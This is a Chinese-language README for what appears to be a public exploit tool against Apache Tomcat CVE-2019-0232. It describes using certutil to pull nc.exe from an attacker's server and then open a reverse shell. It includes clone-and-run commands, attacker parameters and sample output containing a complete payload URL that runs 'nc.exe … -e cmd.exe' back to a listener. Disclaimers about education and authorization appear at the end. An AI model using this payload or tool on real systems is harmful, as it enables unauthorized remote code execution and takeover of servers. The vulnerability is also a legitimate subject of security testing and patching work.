此脚本利用 Apache Tomcat 中的 CVE-2019-0232 漏洞,该漏洞由于对 ism.bat 脚本处理不当,可导致远程代码执行。脚本借助 certutil 和 nc.exe(Netcat)的反向 shell 技术,获取对易受攻击系统的远程访问权限。
ism.bat 请求时的一个漏洞,可允许攻击者在服务器上执行任意命令。该漏洞因缺少对用户输入的有效验证,攻击者可通过特制的请求触发任意命令的执行。nc.exe 文件,并用于生成反向 shell。nc.exe)以建立反向 shell 连接。nc.exe:脚本向易受攻击的 Tomcat 服务器发送特制请求,利用 certutil 将 nc.exe(Netcat)文件下载至目标机器。nc.exe 后,再发送另一请求执行反向 shell 命令,该命令将连接回攻击者的 Netcat 监听器。git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
Target Host(目标主机):要利用的 Apache Tomcat 服务器的 IP 地址。
Target Port(目标端口):目标服务器的端口(默认:8080)。
Server IP(服务器 IP):托管 nc.exe 的服务器的 IP 地址。
Server Port(服务器端口):托管 nc.exe 的端口号(默认:80)。
Netcat Listener IP(Netcat 监听器 IP):将接收反向 shell 的您的 IP 地址。
Netcat Listener Port(Netcat 监听器端口):您正在监听反向 shell 的端口。
[*] 发送下载 nc.exe 的有效载荷...
[+] URL1 响应:200
[*] 发送执行反向 shell 的有效载荷...
[+] URL2 响应:200
[*] 反向 shell 有效载荷 URL:http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
成功执行后,您应该会收到一个连接到 Netcat 监听器的反向 shell。
本脚本仅用于教育目的。请勿用于恶意活动。在执行任何渗透测试或安全审计之前,务必获得适当授权。滥用此脚本可能导致法律后果。
使用此漏洞利用工具前,请确保 Apache Tomcat 服务器未修补 CVE-2019-0232。 根据目标系统的配置,脚本可能需要管理员权限。
作者:A!Z3N(Dharan) Powered by passion!
本项目基于 MIT 许可证 授权。
不过,请自行承担使用风险。此代码仅用于教育目的。使用此代码即表示您同意对因使用此代码而产生的任何行为承担全部责任。滥用或未经授权使用此漏洞利用工具可能导致法律后果。在对任何系统执行安全测试或渗透测试之前,请始终获得适当授权。
您可以自由地使用、修改和分发此代码,但仅限于道德目的。作者不对因使用此代码造成的任何损害负责。
未经目标系统所有者的明确许可,请勿使用此漏洞利用工具。